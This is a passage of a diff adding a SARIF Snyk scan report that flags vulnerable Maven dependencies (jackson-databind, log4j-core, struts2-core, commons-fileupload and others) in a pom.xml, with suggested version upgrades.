"uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467015", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-540500", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-548451", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559094", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561373", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561585", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561586", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561587", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564887", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-564888", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-570625", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572300", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572314", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72446", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72447", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72883", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72884", + "level": "error", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-databind package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-databind@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-core package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-core@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable com.fasterxml.jackson.core:jackson-core package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "com.fasterxml.jackson.core:jackson-core@2.6.5" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMMONSCOLLECTIONS-472711", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable commons-collections:commons-collections package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "commons-collections:commons-collections@3.1" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMMONSFILEUPLOAD-30082", + "level": "error", + "message": { + "text": "This file introduces a vulnerable commons-fileupload:commons-fileupload package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "commons-fileupload:commons-fileupload@1.3.1" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.30" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.30" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMMONSFILEUPLOAD-31540", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable commons-fileupload:commons-fileupload package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "commons-fileupload:commons-fileupload@1.3.1" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.30" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.30" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMMONSFILEUPLOAD-3326457", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable commons-fileupload:commons-fileupload package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "commons-fileupload:commons-fileupload@1.3.1" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@6.1.2" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@6.1.2" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-COMMONSIO-1277109", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable commons-io:commons-io package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "commons-io:commons-io@2.2" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@6.0.0" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@6.0.0" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-DOM4J-174153", + "level": "error", + "message": { + "text": "This file introduces a vulnerable dom4j:dom4j package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "dom4j:dom4j@1.6.1" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-DOM4J-2812975", + "level": "error", + "message": { + "text": "This file introduces a vulnerable dom4j:dom4j package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "dom4j:dom4j@1.6.1" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-JAVAXSERVLET-30449", + "level": "error", + "message": { + "text": "This file introduces a vulnerable javax.servlet:jstl package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "javax.servlet:jstl@1.2" + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-OGNL-30474", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable ognl:ognl package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "ognl:ognl@3.0.6" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.28" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.28" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2321524", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.logging.log4j:log4j-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.logging.log4j:log4j-core@2.7" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.logging.log4j:log4j-core@2.12.3" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.logging.log4j:log4j-core@2.12.3" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-2327339", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.apache.logging.log4j:log4j-core package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.logging.log4j:log4j-core@2.7" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.logging.log4j:log4j-core@2.12.4" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.logging.log4j:log4j-core@2.12.4" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHELOGGINGLOG4J-567761", + "level": "note", + "message": { + "text": "This file introduces a vulnerable org.apache.logging.log4j:log4j-core package with a low severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.logging.log4j:log4j-core@2.7" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.logging.log4j:log4j-core@2.13.2" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.logging.log4j:log4j-core@2.13.2" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-2635340", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.5.30" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.5.30" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-30060", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.24.1" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.24.1" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-30770", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.20.3" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.20.3" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-30773", + "level": "warning", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a medium severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.28" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.28" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-30774", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.29" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.29" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": "SNYK-JAVA-ORGAPACHESTRUTS-30775", + "level": "error", + "message": { + "text": "This file introduces a vulnerable org.apache.struts:struts2-core package with a high severity vulnerability." + }, + "locations": [ + { + "physicalLocation": { + "artifactLocation": { + "uri": "pom.xml" + }, + "region": { + "startLine": 1 + } + }, + "logicalLocations": [ + { + "fullyQualifiedName": "org.apache.struts:struts2-core@2.3.20" + } + ] + } + ], + "fixes": [ + { + "description": { + "text": "Upgrade to org.apache.struts:struts2-core@2.3.29" + }, + "artifactChanges": [ + { + "artifactLocation": { + "uri": "pom.xml" + }, + "replacements": [ + { + "deletedRegion": { + "startLine": 1 + }, + "insertedContent": { + "text": "org.apache.struts:struts2-core@2.3.29" + } + } + ] + } + ] + } + ] + }, + { + "ruleId": 